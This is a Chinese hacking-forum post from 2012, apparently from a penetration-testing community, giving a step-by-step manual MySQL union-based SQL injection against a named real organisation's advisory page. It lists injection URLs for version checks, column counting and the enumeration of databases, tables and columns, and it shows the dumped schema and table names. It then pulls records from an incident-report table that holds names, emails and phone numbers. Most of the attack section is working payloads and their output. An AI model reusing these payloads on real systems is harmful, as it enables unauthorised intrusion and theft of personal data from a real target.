中国网络渗透测试联盟
标题:
.高级暴库方法讲解
[打印本页]
作者:
admin
时间:
2012-9-13 17:57
标题:
.高级暴库方法讲解
1.判断版本
http://www.cert.org.tw/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
! T5 d7 z8 O& d+ R8 g
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
* e4 w/ d! l! \% Z- u: Q: c& m( x& D4 c
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--
8 |* ?4 \. S& P+ O X0 x
3.查看数据库版本及当前用户,
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
" t' `6 H- C1 Z3 {0 d
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
' @% R. W' e0 H/ R; Q
4.判断有没有写权限
$ u; f" b7 A# u8 d5 H8 T- Z( V
http://www.cert.org.tw/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
" t' P4 o) o1 u7 s: X- Y
没办法,手动猜表啦
1 s# e$ Y8 s$ `& d3 T. `$ A, n
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
. p+ f# E; ?: B8 p. o% F4 @
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
& S2 L( c; h5 o, z, y: Q$ v
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
$ c# a! }2 P( o* |1 k( y5 W
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
1 Y: v; S) L) Y" H1 t! X2 j
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
+ k+ [; B6 v9 e- q# |) G1 p3 z+ B
6.爆表,爆的是twcert库
& f) O) _7 g" M, J0 C; E
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
! F4 `" f8 {( [) e# U
爆出如下表
) b$ e# t' f) e1 `4 j" r
downloadfile,irsys,newsdata,secrpt,secrpt_big5
6 K8 j( ^4 p% E& E7 G' Y& t
7.爆列名,这次爆的是irsys表
3 P0 k, o. _4 ~$ ?
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
' U" y2 G" p& W6 D0 S; W
爆出如下列
- u% k- g, h! u& ]" b, \2 }
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
1 d L2 @! O( G4 D
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
. R8 R0 j# X4 n. A P
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
8 z$ A) h& m6 ?
返回是3,说明每个列里有3个地段
- b+ E/ i7 G( z. |* i: n
9.爆字段内容
1 x) v$ O) r1 f8 w; D* @4 A4 i
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
; p) M' \ m- w2 c
爆出name列的第一个字段的内容
. O% Y- V$ _! v p; x; \
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
5 z1 j# C7 x0 m1 g6 S
爆出name列的第二个字段的内容
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2